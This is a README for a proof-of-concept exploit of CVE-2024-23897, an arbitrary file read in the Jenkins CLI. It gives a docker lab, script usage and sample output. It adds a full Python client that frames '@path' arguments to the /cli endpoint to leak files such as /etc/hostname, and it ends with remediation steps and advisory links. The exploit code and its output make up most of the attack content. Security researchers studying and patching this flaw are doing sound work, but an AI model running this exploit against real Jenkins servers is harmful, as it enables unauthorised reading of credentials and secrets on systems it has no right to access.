A proof-of-concept (PoC) for CVE-2024-23897, an arbitrary file read vulnerability in Jenkins' built-in command line interface (CLI). The CLI's argument parser (args4j) replaces any argument that starts with `@` with the contents of the file at that path, so a command invoked with an argument such as `@/etc/passwd` leaks that file into the command's output or error message. Attackers with Overall/Read permission (which unauthenticated users hold when anonymous read access is enabled) can read entire files on the Jenkins controller file system; attackers without Overall/Read can still read the first few lines of a file.
Affected Versions
- Jenkins versions <= 2.441
- Jenkins LTS versions <= 2.426.2
Spin up a local vulnerable instance using docker compose:

```shell
cd docker
docker compose up -d
```

The instance will be available at http://localhost:1234
```text
❯ python CVE-2024-23897.py --help
usage: CVE-2024-23897.py [-h] [--url URL] [--file FILE] [--method {1,2,3}]

Jenkins CVE-2024-23897 file-read PoC

options:
  -h, --help        show this help message and exit
  --url URL         URL for Jenkins instance (default: http://localhost:1234)
  --file FILE       File to read (default: /etc/hostname)
  --method {1,2,3}  The method to use [connect-node(1), who-am-i(2), or help(3)] (default: 1)
```
Example

```text
❯ python CVE-2024-23897.py --url 'http://127.0.0.1:1234/' --file '/etc/hostname'
[i] Vulnerable to CVE-2024-23897 (Jenkins v2.441 <= 2.441)
[*] Target URL http://127.0.0.1:1234/cli?remoting=false
[*] Attempting to read /etc/hostname
[i] Download request done
[+] Found data, printing...
ERROR: No such agent "jenkins_vuln_instance" exists.
[i] Upload request done
[i] All threads completed
```

The `ERROR: No such agent ...` line is the leaked content: the default method (connect-node) receives `@/etc/hostname` as its agent-name argument, the server expands it to the file's first line (`jenkins_vuln_instance`, the container's hostname) and echoes that value back in its error message.

The script may have issues reading larger files due to concurrency and connection timeouts. For more technical details and a walkthrough of the vulnerability, take a look at my blog post on the topic.
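As an added example (not the repository's script and not code from the Jenkins project), the following Python builds the same kind of CLI request the PoC sends and parses the frames the server returns. The PlainCLIProtocol framing, the op-code values, the two-request `Session`/`Side` transport behind `/cli?remoting=false` and the single leading 0x00 flush byte are assumptions from reading jenkins-core, not facts stated on this page; `SAMPLE_DOWNLOAD` is constructed to mirror the README's run, not captured from a server.

```python
import threading
import urllib.request
import uuid

# Op codes of Jenkins' PlainCLIProtocol (assumed enum ordinal order in jenkins-core:
# ARG, LOCALE, ENCODING, START, EXIT, STDIN, END_STDIN, STDOUT, STDERR).
OP_ARG, OP_LOCALE, OP_ENCODING, OP_START, OP_EXIT, OP_STDOUT, OP_STDERR = 0, 1, 2, 3, 4, 7, 8
SERVER_OPS = {OP_EXIT, OP_STDOUT, OP_STDERR}


def frame(op, payload=b""):
    """One frame: int32 big-endian length (payload length + 1 for the op byte), op byte, payload."""
    return (len(payload) + 1).to_bytes(4, "big") + bytes([op]) + payload


def java_utf(text):
    """DataOutputStream.writeUTF(): uint16 byte length followed by the UTF-8 bytes."""
    raw = text.encode("utf-8")
    return len(raw).to_bytes(2, "big") + raw


def build_upload_body(args, encoding="UTF-8", locale="en_US"):
    """Upload-side body for a CLI invocation such as ["connect-node", "@/etc/hostname"].
    Every ARG is sent verbatim; it is the server-side args4j parser that turns
    "@/etc/hostname" into the contents of that file (the CVE-2024-23897 root cause)."""
    body = b"".join(frame(OP_ARG, java_utf(a)) for a in args)
    body += frame(OP_ENCODING, java_utf(encoding)) + frame(OP_LOCALE, java_utf(locale))
    return body + frame(OP_START)


def split_frames(data):
    """Return [(op, payload), ...], or None if the bytes do not frame cleanly."""
    frames, i = [], 0
    while i < len(data):
        length = int.from_bytes(data[i:i + 4], "big")
        end = i + 4 + length
        if length < 1 or end > len(data) or data[i + 4] not in SERVER_OPS:
            return None
        frames.append((data[i + 4], data[i + 5:end]))
        i = end
    return frames


def parse_download_stream(data):
    """Collect stdout, stderr and the exit code from the download-side response.
    The server is assumed to write one 0x00 byte before the first frame to flush its
    HTTP headers, so if the stream does not parse from offset 0, retry one byte in."""
    frames = split_frames(data)
    if frames is None:
        frames = split_frames(data[1:]) or []
    stdout, stderr, exit_code = b"", b"", None
    for op, payload in frames:
        if op == OP_STDOUT:
            stdout += payload
        elif op == OP_STDERR:
            stderr += payload
        elif op == OP_EXIT:
            exit_code = int.from_bytes(payload, "big", signed=True)
    return stdout, stderr, exit_code


def extract_leaked_line(stderr):
    """connect-node reports the expanded first line of the file as a missing agent name."""
    text = stderr.decode("utf-8", "replace")
    start = text.find('No such agent "')
    if start < 0:
        return None
    start += len('No such agent "')
    end = text.find('" exists.', start)
    return text[start:end] if end > start else None


def read_file(url, path, command="connect-node", timeout=10):
    """Drive both halves of the HTTP transport behind /cli?remoting=false (assumed: two
    POSTs sharing a Session id, Side: download streams frames back, Side: upload
    carries the request frames). Returns (stdout, stderr, exit_code)."""
    endpoint = url.rstrip("/") + "/cli?remoting=false"
    session, received = str(uuid.uuid4()), {}

    def download():
        req = urllib.request.Request(endpoint, method="POST",
                                     headers={"Session": session, "Side": "download"})
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            received["body"] = resp.read()

    worker = threading.Thread(target=download, daemon=True)
    worker.start()
    upload = urllib.request.Request(
        endpoint, data=build_upload_body([command, "@" + path]), method="POST",
        headers={"Session": session, "Side": "upload", "Content-Type": "application/octet-stream"})
    urllib.request.urlopen(upload, timeout=timeout).close()
    worker.join(timeout)
    return parse_download_stream(received.get("body", b""))


# Constructed sample of a download-side response for the README's run (not captured
# from a real server): flush byte, one STDERR frame, one EXIT frame with code 3.
SAMPLE_DOWNLOAD = (b"\x00"
                   + frame(OP_STDERR, b'ERROR: No such agent "jenkins_vuln_instance" exists.\n')
                   + frame(OP_EXIT, (3).to_bytes(4, "big")))
```

Against a live instance, `extract_leaked_line(read_file("http://127.0.0.1:1234", "/etc/hostname")[1])` is the equivalent of the README's default run; the download request is started on a thread because the server only answers it once the upload side has delivered the frames, which is also why the PoC reports separate download and upload completions. If the download request fails (for example a 403 because the caller lacks Overall/Read), the thread dies and `read_file` returns empty output with `None` as the exit code.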
- Upgrade to Jenkins 2.442 or LTS 2.426.3
- Apply temporary workarounds as described in the Jenkins security advisory.
- SonarSource | Excessive Expansion: Uncovering Critical Security Vulnerabilities in Jenkins
- Jenkins Security Advisory - 2024-01-24
- Qualys ThreatPROTECT | Jenkins Core Remote Code Execution Vulnerability (CVE-2024-23897)
- CVE-2024-23897: Assessing the Impact of the Jenkins Arbitrary File Leak Vulnerability – Horizon3.ai